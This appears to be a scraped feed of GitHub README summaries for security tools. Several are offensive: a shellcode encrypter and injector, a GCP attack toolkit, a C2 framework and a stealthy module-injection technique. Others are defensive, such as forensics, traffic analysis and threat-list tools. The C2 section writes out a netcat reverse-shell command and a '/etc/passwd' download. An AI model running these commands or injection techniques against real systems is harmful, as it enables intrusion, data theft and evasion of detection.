    • -key: Provide the encryption key.
    • -l: Specify the language (Supported languages: cs, rs, ps1, aspx, vba).
    • -m: Specify the method type (Supported types: valloc, pinject, hollow, ntinject).
    • -procname: Provide the process name to be injected (default is "explorer").
    • -scfile: Provide the path to the shellcode file.

    To generate c# source code that contains encrypted shellcode.

    Note that if AES256 has been selected as an encryption method, the Initialization Vector (IV) will be auto-generated.

    ./dvenom -e aes256 -key secretKey -l cs -m ntinject -procname explorer -scfile /home/zerx0r/shellcode.bin > ntinject.cs

    Language Supported Methods Supported Encryption
    C# valloc, pinject, hollow, ntinject xor, rot, aes256, rc4
    Rust pinject, hollow, ntinject xor, rot, rc4
    PowerShell valloc, pinject xor, rot
    ASPX valloc xor, rot
    VBA valloc xor, rot

    Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.

    This project is licensed under the MIT License - see the LICENSE file for details.

    Double Venom (DVenom) is intended for educational and ethical testing purposes only. Using DVenom for attacking targets without prior mutual consent is illegal. The tool developer and contributor(s) are not responsible for any misuse of this tool.



    TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

    By: Zion3R


    TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

    • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
    • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
    • Summary statistics on captured packets.
    • Interactive mode for in-depth packet inspection.
    • Timestamps for each captured packet.
    • User-friendly colored output for improved readability.
    • Python 3.x
    • scapy
    • argparse
    • pyshark
    • colorama

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/TrafficWatch.git
    2. Navigate to the project directory:

      cd TrafficWatch
    3. Install the required dependencies:

      pip install -r requirements.txt

    python3 trafficwatch.py --help
    usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

    Packet Sniffer Tool

    options:
    -h, --help show this help message and exit
    -f FILE, --file FILE Path to the .pcap file to analyze
    -p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
    Filter by specific protocol
    -c COUNT, --count COUNT
    Number of packets to display

    To analyze packets from a PCAP file, use the following command:

    python trafficwatch.py -f path/to/your.pcap

    To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

    python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

    • -f or --file: Path to the PCAP file for analysis.
    • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
    • -c or --count: Limit the number of displayed packets.

    Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

    If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

    This project is licensed under the MIT License.

    Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!"Β 



    GATOR - GCP Attack Toolkit For Offensive Research, A Tool Designed To Aid In Research And Exploiting Google Cloud Environments

    By: Zion3R


    GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.


    Modules

    Resource Category Primary Module Command Group Operation Description
    User Authentication auth - activate Activate a Specific Authentication Method
    - add Add a New Authentication Method
    - delete Remove a Specific Authentication Method
    - list List All Available Authentication Methods
    Cloud Functions functions - list List All Deployed Cloud Functions
    - permissions Display Permissions for a Specific Cloud Function
    - triggers List All Triggers for a Specific Cloud Function
    Cloud Storage storage buckets list List All Storage Buckets
    permissions Display Permissions for Storage Buckets
    Compute Engine compute instances add-ssh-key Add SSH Key to Compute Instances

    Installation

    Python 3.11 or newer should be installed. You can verify your Python version with the following command:

    python --version

    Manual Installation via setup.py

    git clone https://github.com/anrbn/GATOR.git
    cd GATOR
    python setup.py install

    Automated Installation via pip

    pip install gator-red

    Documentation

    Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!

    Issues

    Reporting an Issue

    If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:

    1. Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.

    2. Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.

    3. Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.

    4. Submit the Issue: After you've filled out all the necessary information, click Submit new issue.

    Your feedback is important, and will help improve the tool. I appreciate your contribution!

    Resolving an Issue

    I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.

    Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.

    Contributing

    I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.

    Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!

    Thank you for considering contributing to the project.

    Questions and Issues

    If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)



    SecuSphere - Efficient DevSecOps

    By: Zion3R


    SecuSphere is a comprehensive DevSecOps platform designed to streamline and enhance your organization's security posture throughout the software development life cycle. Our platform serves as a centralized hub for vulnerability management, security assessments, CI/CD pipeline integration, and fostering DevSecOps practices and culture.


    Centralized Vulnerability Management

    At the heart of SecuSphere is a powerful vulnerability management system. Our platform collects, processes, and prioritizes vulnerabilities, integrating with a wide array of vulnerability scanners and security testing tools. Risk-based prioritization and automated assignment of vulnerabilities streamline the remediation process, ensuring that your teams tackle the most critical issues first. Additionally, our platform offers robust dashboards and reporting capabilities, allowing you to track and monitor vulnerability status in real-time.

    Seamless CI/CD Pipeline Integration

    SecuSphere integrates seamlessly with your existing CI/CD pipelines, providing real-time security feedback throughout your development process. Our platform enables automated triggering of security scans and assessments at various stages of your pipeline. Furthermore, SecuSphere enforces security gates to prevent vulnerable code from progressing to production, ensuring that security is built into your applications from the ground up. This continuous feedback loop empowers developers to identify and fix vulnerabilities early in the development cycle.

    Comprehensive Security Assessment

    SecuSphere offers a robust framework for consuming and analyzing security assessment reports from various CI/CD pipeline stages. Our platform automates the aggregation, normalization, and correlation of security findings, providing a holistic view of your application's security landscape. Intelligent deduplication and false-positive elimination reduce noise in the vulnerability data, ensuring that your teams focus on real threats. Furthermore, SecuSphere integrates with ticketing systems to facilitate the creation and management of remediation tasks.

    Cultivating DevSecOps Practices

    SecuSphere goes beyond tools and technology to help you drive and accelerate the adoption of DevSecOps principles and practices within your organization. Our platform provides security training and awareness for developers, security, and operations teams, helping to embed security within your development and operations processes. SecuSphere aids in establishing secure coding guidelines and best practices and fosters collaboration and communication between security, development, and operations teams. With SecuSphere, you'll create a culture of shared responsibility for security, enabling you to build more secure, reliable software.

    Embrace the power of integrated DevSecOps with SecuSphere – secure your software development, from code to cloud.

     Features

    • Vulnerability Management: Collect, process, prioritize, and remediate vulnerabilities from a centralized platform, integrating with various vulnerability scanners and security testing tools.
    • CI/CD Pipeline Integration: Provide real-time security feedback with seamless CI/CD pipeline integration, including automated security scans, security gates, and a continuous feedback loop for developers.
    • Security Assessment: Analyze security assessment reports from various CI/CD pipeline stages with automated aggregation, normalization, correlation of security findings, and intelligent deduplication.
    • DevSecOps Practices: Drive and accelerate the adoption of DevSecOps principles and practices within your team. Benefit from our security training, secure coding guidelines, and collaboration tools.

    Dashboard and Reporting

    SecuSphere offers built-in dashboards and reporting capabilities that allow you to easily track and monitor the status of vulnerabilities. With our risk-based prioritization and automated assignment features, vulnerabilities are efficiently managed and sent to the relevant teams for remediation.

    API and Web Console

    SecuSphere provides a comprehensive REST API and Web Console. This allows for greater flexibility and control over your security operations, ensuring you can automate and integrate SecuSphere into your existing systems and workflows as seamlessly as possible.

    For more information please refer to our Official Rest API Documentation

    Integration with Ticketing Systems

    SecuSphere integrates with popular ticketing systems, enabling the creation and management of remediation tasks directly within the platform. This helps streamline your security operations and ensure faster resolution of identified vulnerabilities.

    Security Training and Awareness

    SecuSphere is not just a tool, it's a comprehensive solution that drives and accelerates the adoption of DevSecOps principles and practices. We provide security training and awareness for developers, security, and operations teams, and aid in establishing secure coding guidelines and best practices.

    User Guide

    Get started with SecuSphere using our comprehensive user guide.

    ο’» Installation

    You can install SecuSphere by cloning the repository, setting up locally, or using Docker.

    Clone the Repository

    $ git clone https://github.com/SecurityUniversalOrg/SecuSphere.git

    Setup

    Local Setup

    Navigate to the source directory and run the Python file:

    $ cd src/
    $ python run.py

    Dockerfile Setup

    Build and run the Dockerfile in the cicd directory:

    $ # From repository root
    $ docker build -t secusphere:latest .
    $ docker run secusphere:latest

    Docker Compose

    Use Docker Compose in the ci_cd/iac/ directory:

    $ cd ci_cd/iac/
    $ docker-compose -f secusphere.yml up

    Pull from Docker Hub

    Pull the latest version of SecuSphere from Docker Hub and run it:

    $ docker pull securityuniversal/secusphere:latest
    $ docker run -p 8081:80 -d secusphere:latest

    Feedback and Support

    We value your feedback and are committed to providing the best possible experience with SecuSphere. If you encounter any issues or have suggestions for improvement, please create an issue in this repository or contact our support team.

    Contributing

    We welcome contributions to SecuSphere. If you're interested in improving SecuSphere or adding new features, please read our contributing guide.



    Commander - A Command And Control (C2) Server

    By: Zion3R


    Commander is a command and control framework (C2) written in Python, Flask and SQLite. ItΒ comes with two agents written in Python and C.

    Under Continuous Development

    Not script-kiddie friendly


    Features

    • Fully encrypted communication (TLS)
    • Multiple Agents
    • Obfuscation
    • Interactive Sessions
    • Scalable
    • Base64 data encoding
    • RESTful API

    Agents

    • Python 3
      • The python agent supports:
        • sessions, an interactive shell between the admin and the agent (like ssh)
        • obfuscation
        • Both Windows and Linux systems
        • download/upload files functionality
    • C
      • The C agent supports only the basic functionality for now, the control of tasks for the agents
      • Only for Linux systems

    Requirements

    Python >= 3.6 is required to run and the following dependencies

    Linux for the admin.py and c2_server.py. (Untested for windows)
    apt install libcurl4-openssl-dev libb64-dev
    apt install openssl
    pip3 install -r requirements.txt

    How to Use it

    First create the required certs and keys

    # if you want to secure your key with a passphrase exclude the -nodes
    openssl req -x509 -newkey rsa:4096 -keyout server.key -out server.crt -days 365 -nodes

    Start the admin.py module first in order to create a local sqlite db file

    python3 admin.py

    Continue by running the server

    python3 c2_server.py

    And last the agent. For the python case agent you can just run it but in the case of the C agent you need to compile it first.

    # python agent
    python3 agent.py

    # C agent
    gcc agent.c -o agent -lcurl -lb64
    ./agent

    By default both the Agents and the server are running over TLS and base64. The communication point is set to 127.0.0.1:5000 and in case a different point is needed it should be changed in Agents source files.

    As the Operator/Administrator you can use the following commands to control your agents

    Commands:

    task add arg c2-commands
    Add a task to an agent, to a group or on all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    c2-commands: possible values are c2-register c2-shell c2-sleep c2-quit
    c2-register: Triggers the agent to register again.
    c2-shell cmd: It takes an shell command for the agent to execute. eg. c2-shell whoami
    cmd: The command to execute.
    c2-sleep: Configure the interval that an agent will check for tasks.
    c2-session port: Instructs the agent to open a shell session with the server to this port.
    port: The port to connect to. If it is not provided it defaults to 5555.
    c2-quit: Forces an agent to quit.

    task delete arg
    Delete a task from an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show agent arg
    Displays inf o for all the availiable agents or for specific agent.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show task arg
    Displays the task of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    show result arg
    Displays the history/result of an agent or all agents.
    arg: can have the following values: 'all' 'type=Linux|Windows' 'your_uuid'
    find active agents
    Drops the database so that the active agents will be registered again.

    exit
    Bye Bye!


    Sessions:

    sessions server arg [port]
    Controls a session handler.
    arg: can have the following values: 'start' , 'stop' 'status'
    port: port is optional for the start arg and if it is not provided it defaults to 5555. This argument defines the port of the sessions server
    sessions select arg
    Select in which session to attach.
    arg: the index from the 'sessions list' result
    sessions close arg
    Close a session.
    arg: the index from the 'sessions list' result
    sessions list
    Displays the availiable sessions
    local-ls directory
    Lists on your host the files on the selected directory
    download 'file'
    Downloads the 'file' locally on the current directory
    upload 'file'
    Uploads a file in the directory where the agent currently is

    Special attention should be given to the 'find active agents' command. This command deletes all the tables and creates them again. It might sound scary but it is not, at least that is what i believe :P

    The idea behind this functionality is that the c2 server can request from an agent to re-register at the case that it doesn't recognize him. So, since we want to clear the db from unused old entries and at the same time find all the currently active hosts we can drop the tables and trigger the re-register mechanism of the c2 server. See below for the re-registration mechanism.

    Flows

    Below you can find a normal flow diagram

    Normal Flow

    In case where the environment experiences a major failure like a corrupted database or some other critical failure the re-registration mechanism is enabled so we don't lose our connection with our agents.

    More specifically, in case where we lose the database we will not have any information about the uuids that we are receiving thus we can't set tasks on them etc... So, the agents will keep trying to retrieve their tasks and since we don't recognize them we will ask them to register again so we can insert them in our database and we can control them again.

    Below is the flow diagram for this case.

    Re-register Flow

    Useful examples

    To setup your environment start the admin.py first and then the c2_server.py and run the agent. After you can check the availiable agents.

    # show all availiable agents
    show agent all

    To instruct all the agents to run the command "id" you can do it like this:

    To check the history/ previous results of executed tasks for a specific agent do it like this:
    # check the results of a specific agent
    show result 85913eb1245d40eb96cf53eaf0b1e241

    You can also change the interval of the agents that checks for tasks to 30 seconds like this:

    # to set it for all agents
    task add all c2-sleep 30

    To open a session with one or more of your agents do the following.

    # find the agent/uuid
    show agent all

    # enable the server to accept connections
    sessions server start 5555

    # add a task for a session to your prefered agent
    task add your_prefered_agent_uuid_here c2-session 5555

    # display a list of available connections
    sessions list

    # select to attach to one of the sessions, lets select 0
    sessions select 0

    # run a command
    id

    # download the passwd file locally
    download /etc/passwd

    # list your files locally to check that passwd was created
    local-ls

    # upload a file (test.txt) in the directory where the agent is
    upload test.txt

    # return to the main cli
    go back

    # check if the server is running
    sessions server status

    # stop the sessions server
    sessions server stop

    If for some reason you want to run another external session like with netcat or metaspolit do the following.

    # show all availiable agents
    show agent all

    # first open a netcat on your machine
    nc -vnlp 4444

    # add a task to open a reverse shell for a specific agent
    task add 85913eb1245d40eb96cf53eaf0b1e241 c2-shell nc -e /bin/sh 192.168.1.3 4444

    This way you will have a 'die hard' shell that even if you get disconnected it will get back up immediately. Only the interactive commands will make it die permanently.

    Obfuscation

    The python Agent offers obfuscation using a basic AES ECB encryption and base64 encoding

    Edit the obfuscator.py file and change the 'key' value to a 16 char length key in order to create a custom payload. The output of the new agent can be found in Agents/obs_agent.py

    You can run it like this:

    python3 obfuscator.py

    # and to run the agent, do as usual
    python3 obs_agent.py

    Tips &Tricks

    1. The build-in flask app server can't handle multiple/concurrent requests. So, you can use the gunicorn server for better performance like this:
    gunicorn -w 4 "c2_server:create_app()" --access-logfile=- -b 0.0.0.0:5000 --certfile server.crt --keyfile server.key 
    1. Create a binary file for your python agent like this
    pip install pyinstaller
    pyinstaller --onefile agent.py

    The binary can be found under the dist directory.

    In case something fails you may need to update your python and pip libs. If it continues failing then ..well.. life happened

    1. Create new certs in each engagement

    2. Backup your c2.db, it is easy... just a file

    Testing

    pytest was used for the testing. You can run the tests like this:

    cd tests/
    py.test

    Be careful: You must run the tests inside the tests directory otherwise your c2.db will be overwritten and you will lose your data

    To check the code coverage and produce a nice html report you can use this:

    # pip3 install pytest-cov
    python -m pytest --cov=Commander --cov-report html

    Disclaimer: This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Running this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.



    JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

    By: Zion3R


    JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


    Prerequisites

    Before installing JSpector, you need to have Jython installed on Burp Suite.

    Installation

    1. Download the latest version of JSpector
    2. Open Burp Suite and navigate to the Extensions tab.
    3. Click the Add button in the Installed tab.
    4. In the Extension Details dialog box, select Python as the Extension Type.
    5. Click the Select file button and navigate to the JSpector.py.
    6. Click the Next button.
    7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

    Usage

    • Just navigate through your targets and JSpector will start passively crawl JS files in the background and automatically returns the results on the Dashboard tab.
    • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



    Spoofy - Program That Checks If A List Of Domains Can Be Spoofed Based On SPF And DMARC Records

    By: Zion3R



    Spoofy is a program that checks if a list of domains can be spoofed based on SPF and DMARC records. You may be asking, "Why do we need another tool that can check if a domain can be spoofed?"

    Well, Spoofy is different and here is why:

    1. Authoritative lookups on all lookups with known fallback (Cloudflare DNS)
    2. Accurate bulk lookups
    3. Custom, manually tested spoof logic (No guessing or speculating, real world test results)
    4. SPF lookup counter

    Β 

    HOW TO USE

    Spoofy requires Python 3+. Python 2 is not supported. Usage is shown below:

    Usage:
    ./spoofy.py -d [DOMAIN] -o [stdout or xls]
    OR
    ./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]

    Install Dependencies:
    pip3 install -r requirements.txt

    HOW DO YOU KNOW ITS SPOOFABLE

    (The spoofability table lists every combination of SPF and DMARC configurations that impact deliverability to the inbox, except for DKIM modifiers.) Download Here

    METHODOLOGY

    The creation of the spoofability table involved listing every relevant SPF and DMARC configuration, combining them, and then conducting SPF and DMARC information collection using an early version of Spoofy on a large number of US government domains. Testing if an SPF and DMARC combination was spoofable or not was done using the email security pentesting suite at emailspooftest using Microsoft 365. However, the initial testing was conducted using Protonmail and Gmail, but these services were found to utilize reverse lookup checks that affected the results, particularly for subdomain spoof testing. As a result, Microsoft 365 was used for the testing, as it offered greater control over the handling of mail.

    After the initial testing using Microsoft 365, some combinations were retested using Protonmail and Gmail due to the differences in their handling of banners in emails. Protonmail and Gmail can place spoofed mail in the inbox with a banner or in spam without a banner, leading to some SPF and DMARC combinations being reported as "Mailbox Dependent" when using Spoofy. In contrast, Microsoft 365 places both conditions in spam. The testing and data collection process took several days to complete, after which a good master table was compiled and used as the basis for the Spoofy spoofability logic.

    DISCLAIMER

    This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this tool and software.

    CREDIT

    Lead / Only programmer & spoofability logic comprehension upgrades & lookup resiliency system / fix (main issue with other tools) & multithreading & feature additions: Matt Keeley

    DMARC, SPF, DNS insights & Spoofability table creation/confirmation/testing & application accuracy/quality assurance: calamity.email / eman-ekaf

    Logo: cobracode

    Tool was inspired by Bishop Fox's project called spoofcheck.



    Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

    By: Zion3R

    Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

    This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.


    What is Dissect?

    Dissect is an incident response framework build from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

    Singular approach

    And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

    If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

    Create a lightweight container using Acquire

    Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query and target-shell, but feel free to use other tools as well.

    A modular setup

    Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

    Try it out now!

    Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.

    Don’t know where to start? Check out the introduction page.

    Want to get a detailed overview? Check out the overview page.

    Want to read everything? Check out the documentation.

    Projects

    Dissect currently consists of the following projects.

    Related

    These projects are closely related to Dissect, but not installed by this meta package.

    Requirements

    This project is part of the Dissect framework and requires Python.

    Information on the supported Python versions can be found in the Getting Started section of the documentation.

    Installation

    dissect is available on PyPI.

    pip install dissect

    Build and test instructions

    This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

    tox -e build

    The build artifacts can be found in the dist/ directory.

    tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:

    tox

    For a more elaborate explanation on how to build and test the project, please see the documentation.



    ModuleShifting - Stealthier Variation Of Module Stomping And Module Overloading Injection Techniques That Reduces Memory IoCs

    By: Zion3R


    ModuleShifting is stealthier variation of Module Stomping and Module overloading injection technique. It is actually implemented in Python ctypes so that it can be executed fully in memory via a Python interpreter and Pyramid, thus avoiding the usage of compiled loaders.

    The technique can be used with PE or shellcode payloads, however, the stealthier variation is to be used with shellcode payloads that need to be functionally independent from the final payload that the shellcode is loading.


    ModuleShifting, when used with shellcode payload, is performing the following operations:

    1. Legitimate hosting dll is loaded via LoadLibrary
    2. Change the memory permissions of a specified section to RW
    3. Overwrite shellcode over the target section
    4. add optional padding to better blend into false positive behaviour (more information here)
    5. Change permissions to RX
    6. Execute shellcode via function pointer - additional execution methods: function callback or CreateThread API
    7. Write original dll content over the executed shellcode - this step avoids leaving a malicious memory artifact on the image memory space of the hosting dll. The shellcode needs to be functionally independent from further stages otherwise execution will break.

    When using a PE payload, ModuleShifting will perform the following operation:

    1. Legitimate hosting dll is loaded via LoadLibrary
    2. Change the memory permissions of a specified section to RW
    3. copy the PE over the specified target point section-by-section
    4. add optional padding to better blend into false positive behaviour
    5. perform base relocation
    6. resolve imports
    7. finalize section by setting permissions to their native values (avoids the creation of RWX memory region)
    8. TLS callbacks execution
    9. Executing PE entrypoint

    Why it's useful

    ModuleShifting can be used to inject a payload without dynamically allocating memory (i.e. VirtualAlloc) and compared to Module Stomping and Module Overloading is stealthier because it decreases the amount of IoCs generated by the injection technique itself.

    There are 3 main differences between Module Shifting and some public implementations of Module stomping (one from Bobby Cooke and WithSecure)

    1. Padding: when writing shellcode or PE, you can use padding to better blend into common False Positive behaviour (such as third-party applications or .net dlls writing x amount of bytes over their .text section).
    2. Shellcode execution using function pointer. This helps in avoid a new thread creation or calling unusual function callbacks.
    3. restoring of original dll content over the executed shellcode. This is a key difference.

    The differences between Module Shifting and Module Overloading are the following:

    1. The PE can be written starting from a specified section instead of starting from the PE of the hosting dll. Once the target section is chosen carefully, this can reduce the amount of IoCs generated (i.e. PE header of the hosting dll is not overwritten or less bytes overwritten on .text section etc.)
    2. Padding that can be added to the PE payload itself to better blend into false positives.

    Using a functionally independent shellcode payload such as an AceLdr Beacon Stageless shellcode payload, ModuleShifting is able to locally inject without dynamically allocating memory and at the moment generating zero IoC on a Moneta and PE-Sieve scan. I am aware that the AceLdr sleeping payloads can be caught with other great tools such as Hunt-Sleeping-Beacon, but the focus here is on the injection technique itself, not on the payload. In our case what is enabling more stealthiness in the injection is the shellcode functional independence, so that the written malicious bytes can be restored to its original content, effectively erasing the traces of the injection.

    Disclaimer

    All information and content is provided for educational purposes only. Follow instructions at your own risk. Neither the author nor his employer are responsible for any direct or consequential damage or loss arising from any person or organization.

    Credits

    This work has been made possible because of the knowledge and tools shared by incredible people like Aleksandra Doniec @hasherezade, Forest Orr and Kyle Avery. I heavily used Moneta, PeSieve, PE-Bear and AceLdr throughout all my learning process and they have been key for my understanding of this topic.

    Usage

    ModuleShifting can be used with Pyramid and a Python interpreter to execute the local process injection fully in-memory, avoiding compiled loaders.

    1. Clone the Pyramid repo:

    git clone https://github.com/naksyn/Pyramid

    1. Generate a shellcode payload with your preferred C2 and drop it into Pyramid Delivery_files folder. See Caveats section for payload requirements.
    2. modify the parameters of moduleshifting.py script inside Pyramid Modules folder.
    3. Start the Pyramid server: python3 pyramid.py -u testuser -pass testpass -p 443 -enc chacha20 -passenc superpass -generate -server 192.168.1.2 -setcradle moduleshifting.py
    4. execute the generated cradle code on a python interpreter.

    Caveats

    To successfully execute this technique you should use a shellcode payload that is capable of loading an additional self-sustainable payload in another area of memory. ModuleShifting has been tested with AceLdr payload, which is capable of loading an entire copy of Beacon on the heap, so breaking the functional dependency with the initial shellcode. This technique would work with any shellcode payload that has similar capabilities. So the initial shellcode becomes useless once executed and there's no reason to keep it in memory as an IoC.

    A hosting dll with enough space for the shellcode on the targeted section should also be chosen, otherwise the technique will fail.

    Detection opportunities

    Module Stomping and Module Shifting need to write shellcode on a legitimate dll memory space. ModuleShifting will eliminate this IoC after the cleanup phase but indicators could be spotted by scanners with realtime inspection capabilities.



    KaliPackergeManager - Kali Packerge Manager

    By: Zion3R


    kalipm.sh is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories.Β 


    Features

    • Interactive Menu: Enjoy an intuitive and user-friendly menu-based interface for easy package selection.
    • Categorized Packages: Browse packages across multiple categories, including System, Desktop, Tools, Menu, and Others.
    • Efficient Installation: Automatically install selected packages with the help of the apt-get package manager.
    • System Updates: Keep your system up to date with the integrated update functionality.

    Installation

    To install KaliPm, you can simply clone the repository from GitHub:

    git clone https://github.com/HalilDeniz/KaliPackergeManager.git

    Usage

    1. Clone the repository or download the KaliPM.sh script.
    2. Navigate to the directory where the script is located.
    3. Make the script executable by running the following command:
      chmod +x kalipm.sh
    4. Execute the script using the following command:
      ./kalipm.sh
    5. Follow the on-screen instructions to select a category and choose the desired packages for installation.

    Categories

    • System: Includes essential core items that are always included in the Kali Linux system.
    • Desktop: Offers various desktop environments and window managers to customize your Kali Linux experience.
    • Tools: Provides a wide range of specialized tools for tasks such as hardware hacking, cryptography, wireless protocols, and more.
    • Menu: Consists of packages tailored for information gathering, vulnerability assessments, web application attacks, and other specific purposes.
    • Others: Contains additional packages and resources that don't fall into the above categories.

    Update

    KaliPM.sh also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.

    Contributing

    Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about Tool Name, please feel free to contact me:



    Associated-Threat-Analyzer - Detects Malicious IPv4 Addresses And Domain Names Associated With Your Web Application Using Local Malicious Domain And IPv4 Lists

    By: Zion3R


    Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.


    Installation

    From Git

    git clone https://github.com/OsmanKandemir/associated-threat-analyzer.git
    cd associated-threat-analyzer && pip3 install -r requirements.txt
    python3 analyzer.py -d target-web.com

    From Dockerfile

    You can run this application on a container after build a Dockerfile.

    Warning : If you want to run a Docker container, associated threat analyzer recommends to use your malicious IPs and domains lists, because maintainer may not be update a default malicious IP and domain lists on docker image.
    docker build -t osmankandemir/threatanalyzer .
    docker run osmankandemir/threatanalyzer -d target-web.com

    From DockerHub

    docker pull osmankandemir/threatanalyzer
    docker run osmankandemir/threatanalyzer -d target-web.com

    Usage

    -d DOMAIN , --domain DOMAIN Input Target. --domain target-web1.com
    -t DOMAINSFILE, --DomainsFile Malicious Domains List to Compare. -t SampleMaliciousDomains.txt
    -i IPSFILE, --IPsFile Malicious IPs List to Compare. -i SampleMaliciousIPs.txt
    -o JSON, --json JSON JSON output. --json

    DONE

    • First-level depth scan your domain address.

    TODO list

    • Third-level or the more depth static files scanning for target web application.
    Other linked github project. You can take a look.
    Finds related domains and IPv4 addresses to do threat intelligence after Indicator-Intelligence v1.1.1 collects static files

    https://github.com/OsmanKandemir/indicator-intelligence

    Default Malicious IPs and Domains Sources

    https://github.com/stamparm/blackbook

    https://github.com/stamparm/ipsum

    Development and Contribution

    See; CONTRIBUTING.md



    Tiny_Tracer - A Pin Tool For Tracing API Calls Etc

    By: Zion3R


    A Pin Tool for tracing:


    Bypasses the anti-tracing check based on RDTSC.

    Generates a report in a .tag format (which can be loaded into other analysis tools):

    RVA;traced event

    i.e.

    345c2;section: .text
    58069;called: C:\Windows\SysWOW64\kernel32.dll.IsProcessorFeaturePresent
    3976d;called: C:\Windows\SysWOW64\kernel32.dll.LoadLibraryExW
    3983c;called: C:\Windows\SysWOW64\kernel32.dll.GetProcAddress
